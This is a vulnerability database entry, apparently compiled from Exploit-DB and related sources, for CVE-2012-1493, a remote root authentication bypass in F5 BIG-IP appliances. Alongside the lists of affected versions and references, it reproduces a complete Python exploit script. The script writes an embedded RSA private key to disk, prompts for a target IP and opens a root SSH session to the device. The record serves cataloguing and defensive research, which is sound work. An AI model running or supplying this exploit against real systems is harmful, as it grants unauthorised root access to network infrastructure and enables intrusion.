ID

VAR-E-201206-0489


CVE

cve_id:CVE-2012-1493

Trust: 2.9

sources: BID: 53897 // PACKETSTORM: 113526 // PACKETSTORM: 113577 // EXPLOIT-DB: 19091 // EDBNET: 41331

EDB ID

19091


TITLE

F5 BIG-IP - Authentication Bypass - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 19091

DESCRIPTION

F5 BIG-IP - Authentication Bypass. CVE-2012-1493CVE-82780 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 19091

AFFECTED PRODUCTS

vendor:f5model:big-ipscope: - version: -

Trust: 1.0

vendor:f5model:big-ip remote root authenticationscope: - version: -

Trust: 0.5

vendor:f5model: - scope: - version: -

Trust: 0.5

vendor:f5model:enterprise managerscope:eqversion:2.3

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:2.2

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.4.1

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:2.0

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.8

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.6

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.4

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.2

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:1.0

Trust: 0.3

vendor:f5model:bigip psmscope:eqversion:10.1

Trust: 0.3

vendor:f5model:bigip psmscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:bigip psmscope:eqversion:10.0

Trust: 0.3

vendor:f5model:bigip psmscope:eqversion:9.4.8

Trust: 0.3

vendor:f5model:bigip psmscope:eqversion:9.4.5

Trust: 0.3

vendor:f5model:bigip local traffic manager hf2scope:eqversion:10.2.1

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:10.1

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:10.0

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.4.8

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.3.5

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.1.3

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.4

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.3.1

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.3

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.2

Trust: 0.3

vendor:f5model:bigip local traffic managerscope:eqversion:9.0

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:10.1

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:10.0

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.4.8

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.3.1

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.2.5

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.2.2

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.4

Trust: 0.3

vendor:f5model:bigip link controllerscope:eqversion:9.3

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.4.8

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.3.1

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.2.5

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.2.2

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.4

Trust: 0.3

vendor:f5model:bigip global traffic managerscope:eqversion:9.3

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:10.1

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:10.0.1

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:10.0

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.4.8

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.3.1

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.2.5

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.4

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.3

Trust: 0.3

vendor:f5model:bigip application security managerscope:eqversion:9.2

Trust: 0.3

vendor:f5model:bigip apmscope:eqversion:10.1

Trust: 0.3

sources: BID: 53897 // PACKETSTORM: 113526 // PACKETSTORM: 113577 // EXPLOIT-DB: 19091

EXPLOIT

#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os

filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()

ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()

if os.path.isfile("priv.key"):
os.remove("priv.key")

Trust: 1.0

sources: EXPLOIT-DB: 19091

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 19091

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 19091

TYPE

Authentication Bypass

Trust: 1.0

sources: EXPLOIT-DB: 19091

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 1.0

tag:root

Trust: 1.0

tag:bypass

Trust: 0.5

sources: PACKETSTORM: 113526 // PACKETSTORM: 113577

CREDITS

David Kennedy (ReL1K)

Trust: 0.6

sources: EXPLOIT-DB: 19091

EXTERNAL IDS

db:NVDid:CVE-2012-1493

Trust: 2.9

db:EXPLOIT-DBid:19091

Trust: 1.6

db:EDBNETid:41331

Trust: 0.6

db:PACKETSTORMid:113526

Trust: 0.5

db:PACKETSTORMid:113577

Trust: 0.5

db:BIDid:53897

Trust: 0.3

sources: BID: 53897 // PACKETSTORM: 113526 // PACKETSTORM: 113577 // EXPLOIT-DB: 19091 // EDBNET: 41331

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-1493

Trust: 2.6

url:https://www.exploit-db.com/exploits/19091/

Trust: 0.6

url:http://www.f5.com/

Trust: 0.3

url:https://www.trustmatta.com/advisories/matta-2012-002.txt

Trust: 0.3

url:http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Trust: 0.3

sources: BID: 53897 // PACKETSTORM: 113526 // PACKETSTORM: 113577 // EXPLOIT-DB: 19091 // EDBNET: 41331

SOURCES

db:BIDid:53897
db:PACKETSTORMid:113526
db:PACKETSTORMid:113577
db:EXPLOIT-DBid:19091
db:EDBNETid:41331

LAST UPDATE DATE

2022-07-27T09:33:02.005000+00:00


SOURCES UPDATE DATE

db:BIDid:53897date:2015-03-19T09:29:00

SOURCES RELEASE DATE

db:BIDid:53897date:2012-06-08T00:00:00
db:PACKETSTORMid:113526date:2012-06-12T01:50:33
db:PACKETSTORMid:113577date:2012-06-12T22:42:02
db:EXPLOIT-DBid:19091date:2012-06-12T00:00:00
db:EDBNETid:41331date:2012-06-12T00:00:00